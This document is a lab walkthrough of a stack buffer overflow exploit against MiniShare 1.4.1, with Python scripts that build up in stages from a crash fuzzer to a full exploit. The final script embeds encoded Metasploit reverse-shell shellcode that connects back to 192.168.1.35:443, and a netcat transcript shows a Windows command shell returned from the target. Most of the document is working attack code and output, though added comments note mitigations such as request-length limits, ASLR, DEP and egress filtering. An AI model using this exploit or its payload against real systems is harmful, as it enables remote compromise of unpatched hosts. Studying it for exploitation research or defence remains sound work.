
Stack Based Buffer Overflow

Minishare 1.4.1

Fuzzer
#!/usr/bin/python
# Stage 1 of the walkthrough: the crash trigger ("fuzzer") for MiniShare 1.4.1.
# It sends one HTTP GET whose request-line is 2220 bytes of 0x41 ('A') and
# closes the connection; the later stages on this page replace parts of that
# run with a cyclic pattern, a return address and a payload.
#
# Defender's view: a request-line of this length, made of a single repeated
# byte, is nothing a real client emits.  A request-line length limit in front
# of the service, or an IDS rule on long single-byte runs inside an HTTP
# request line, surfaces this traffic before it reaches the vulnerable parser;
# the root fix is bounds checking on the request line in the server itself.
import socket
target_address="192.168.1.37"   # lab target as given on the page (author's test network)
target_port=80

buffer = "GET " + "\x41" * 2220 + " HTTP/1.1\r\n\r\n"   # 2220 x 'A' between method and version


sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))   # connect() returns None; the name is never used
sock.send(buffer)   # Python 2: str is a byte string, so this goes out as-is (Python 3 send() would raise TypeError)
sock.close()

JMP ESP

View->Executable Modules
shell32.dll
View code in CPU
Search for->Command
JMP ESP
7CA68265

pattern_create.rb
root@bt4f:~$ cd /pentest/exploits/framework3/tools/
root@bt4f:/pentest/exploits/framework3/tools$ ./pattern_create.rb 2220
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa....Cv4Cv5Cv6Cv7Cv8Cv9

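#!/usr/bin/python
# Stage 2 of the walkthrough: the 2220 'A's of the fuzzer are replaced with
# the cyclic pattern produced by `./pattern_create.rb 2220` (shell transcript
# above).  The pattern is built so that each 4-byte slice is unique, so the
# value found in EIP after the crash identifies the offset; that lookup is the
# pattern_offset step that follows.
#
# The literal below is abbreviated with "...." exactly as printed on the page;
# the original script carries the full 2220-byte pattern.
#
# Defender's view: same request shape as the fuzzer - a single ~2.2 KB HTTP
# request-line - so a request-line length limit at a proxy/WAF still applies.
import socket
target_address="192.168.1.37"
target_port=80

buffer = "GET "


# Page extraction had split this one statement across three lines; rejoined here.
buffer+= ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa....Cv4Cv5Cv6Cv7Cv8Cv9")
buffer+= " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))   # connect() returns None; the name is never used
sock.send(buffer)   # Python 2 str is bytes; Python 3 send() would raise TypeError
sock.close()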

offset
root@bt4f:/pentest/exploits/framework3/tools$ ./pattern_offset.rb 36684335
1787
root@bt4f:/pentest/exploits/framework3/tools$ ./pattern_offset.rb Ch7C
1791

#!/usr/bin/python
# Stage 3 of the walkthrough: the pattern_offset results (1787 and 1791) are
# used to lay the buffer out so that a known 4-byte marker lands in EIP and a
# run of 0xCC (int3) bytes sits where the page says ESP points.  Nothing in
# this stage executes attacker-chosen code; the 0xCC region only traps to a
# debugger attached to the target if execution reaches it.
#
# Defender's view: this layout is what a crash record of the bug looks like -
# EIP equal to 0x41414141 and a stack full of 0x90/0xCC.  A crash whose EIP
# is made of request bytes is the signal to treat a bug as exploitable rather
# than as a plain denial of service.
import socket
target_address="192.168.1.37"
target_port=80
buffer = "GET "
buffer+= "\x90" * 1787   # NOP (0x90) padding; 1787 is the pattern_offset result for EIP
buffer+= "\x41\x41\x41\x41" # EIP Should be overwritten here
# NOTE(review): len(buffer) already counts the 4-byte "GET " prefix, so here it
# is 1795 and (1791 - len(buffer)) is -4; "\x90" * -4 is "", so this line
# appends nothing.  It is kept as written on the page.
buffer+= "\x90" * (1791 - len(buffer))
buffer+= "\xcc" * (2220 - len(buffer)) # ESP should point here
buffer+= " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))   # connect() returns None; the name is never used
sock.send(buffer)   # Python 2 str is bytes; Python 3 send() would raise TypeError
sock.close()

7CA68265 -> 6582A67C (the address is placed in the buffer in little-endian byte order, i.e. as \x65\x82\xA6\x7C)
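#!/usr/bin/python
# Stage 4 of the walkthrough: the four marker bytes that landed in EIP are
# replaced with the shell32.dll JMP ESP address located above, written in
# little-endian byte order (7CA68265 -> "\x65\x82\xA6\x7C").  The rest of the
# buffer is still 0xCC (int3) filler, so an attached debugger shows whether
# execution reached the region ESP points at.
#
# Defender's view: the address is specific to the shell32.dll build of the
# stated XP SP2 system - with ASLR it would not be stable, and with DEP/NX
# the stack region would not be executable.  The request is still a single
# GET with a ~2.2 KB request-line of 0x90/0xCC bytes, an easy match for a
# request-line length or non-printable-byte rule at a WAF/IDS.
import socket
target_address="192.168.1.37"
target_port=80
buffer = "GET "
buffer+= "\x90" * 1787   # NOP (0x90) padding up to the bytes that land in EIP
# Page extraction had wrapped the comment on the next line; rejoined here.
buffer+= "\x65\x82\xA6\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7CA68265.
buffer+= "\xcc" * (2220 - len(buffer)) # ESP points here.
buffer+= " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))   # connect() returns None; the name is never used
sock.send(buffer)   # Python 2 str is bytes; Python 3 send() would raise TypeError
sock.close()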

Metasploit msfpayload
root@bt4f:~$ msfpayload windows/shell_reverse_tcp LHOST=192.168.1.35 LPORT=443 C
root@bt4f:~$ msfpayload windows/shell_reverse_tcp LHOST=192.168.1.35 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c

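#!/usr/bin/python
# Stage 5 of the walkthrough: the 0xCC filler after the EIP overwrite is
# replaced by 16 NOPs followed by the 342-byte payload that the msfpayload |
# msfencode command quoted in the comment below produced.  The payload bytes
# are reproduced verbatim from the page and are neither decoded nor altered
# here; the nc transcript that follows shows the outcome the page reports - a
# shell from the target connecting back to 192.168.1.35:443.
#
# Defender's view: every step this stage relies on is a mitigation gap - a
# fixed shell32.dll address (no ASLR), an executable stack (no DEP/NX), a
# missing bounds check in the server, and an outbound TCP connection from a
# file-sharing service to port 443 of another host.  Egress filtering and a
# per-process network allow-list would both flag that last step even if the
# memory corruption itself went unnoticed.
import socket
target_address="192.168.1.37"
target_port=80
buffer = "GET "
buffer+= "\x90" * 1787   # NOP (0x90) padding up to the bytes that land in EIP
buffer+= "\x65\x82\xA6\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7CA68265.
# Page extraction had wrapped the trailing word of this comment onto its own line; rejoined here.
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.35 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c - x86/shikata_ga_nai 342 bytes
buffer+= "\x90" * 16   # short NOP run between the jump target and the payload
buffer+= ("\xdb\xdd\xd9\x74\x24\xf4\x2b\xc9\xb1\x4f\x58\xba\x2c\x98\x23"
"\x27\x31\x50\x1a\x83\xe8\xfc\x03\x50\x16\xe2\xd9\x64\xcb\xae"
"\x21\x95\x0c\xd1\xa8\x70\x3d\xc3\xce\xf1\x6c\xd3\x85\x54\x9d"
"\x98\xcb\x4c\x16\xec\xc3\x63\x9f\x5b\x35\x4d\x20\x6a\xf9\x01"
"\xe2\xec\x85\x5b\x37\xcf\xb4\x93\x4a\x0e\xf1\xce\xa5\x42\xaa"
"\x85\x14\x73\xdf\xd8\xa4\x72\x0f\x57\x94\x0c\x2a\xa8\x61\xa7"
"\x35\xf9\xda\xbc\x7d\xe1\x51\x9a\x5d\x10\xb5\xf8\xa1\x5b\xb2"
"\xcb\x52\x5a\x12\x02\x9b\x6c\x5a\xc9\xa2\x40\x57\x13\xe3\x67"
"\x88\x66\x1f\x94\x35\x71\xe4\xe6\xe1\xf4\xf8\x41\x61\xae\xd8"
"\x70\xa6\x29\xab\x7f\x03\x3d\xf3\x63\x92\x92\x88\x98\x1f\x15"
"\x5e\x29\x5b\x32\x7a\x71\x3f\x5b\xdb\xdf\xee\x64\x3b\x87\x4f"
"\xc1\x30\x2a\x9b\x73\x1b\x23\x68\x4e\xa3\xb3\xe6\xd9\xd0\x81"
"\xa9\x71\x7e\xaa\x22\x5c\x79\xcd\x18\x18\x15\x30\xa3\x59\x3c"
"\xf7\xf7\x09\x56\xde\x77\xc2\xa6\xdf\xad\x45\xf6\x4f\x1e\x26"
"\xa6\x2f\xce\xce\xac\xbf\x31\xee\xcf\x15\x44\x28\x47\x56\xff"
"\xa3\x9c\x3e\x02\xcc\xa3\x05\x8b\x2a\xc9\x69\xda\xe5\x65\x13"
"\x47\x7d\x14\xdc\x5d\x16\xb5\x4f\x3a\xe7\xb0\x73\x95\xb0\x95"
"\x42\xec\x55\x0b\xfc\x46\x48\xd6\x98\xa1\xc8\x0c\x59\x2f\xd0"
"\xc1\xe5\x0b\xc2\x1f\xe5\x17\xb6\xcf\xb0\xc1\x60\xa9\x6a\xa0"
"\xda\x63\xc0\x6a\x8b\xf2\x2a\xad\xcd\xfb\x66\x5b\x31\x4d\xdf"
"\x1a\x4d\x61\xb7\xaa\x36\x9c\x27\x54\xed\x25\x57\x1f\xac\x0f"
"\xf0\xc6\x24\x12\x9d\xf8\x92\x50\x98\x7a\x17\x28\x5f\x62\x52"
"\x2d\x1b\x24\x8e\x5f\x34\xc1\xb0\xcc\x35\xc0\xbb")
buffer+= " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))   # connect() returns None; the name is never used
sock.send(buffer)   # Python 2 str is bytes; Python 3 send() would raise TypeError
sock.close()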

root@bt4f:~# nc -nvvlp 443


listening on [any] 443 ...
connect to [192.168.1.35] from (UNKNOWN) [192.168.1.37] 1101
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\MiniShare>

GRACIAS
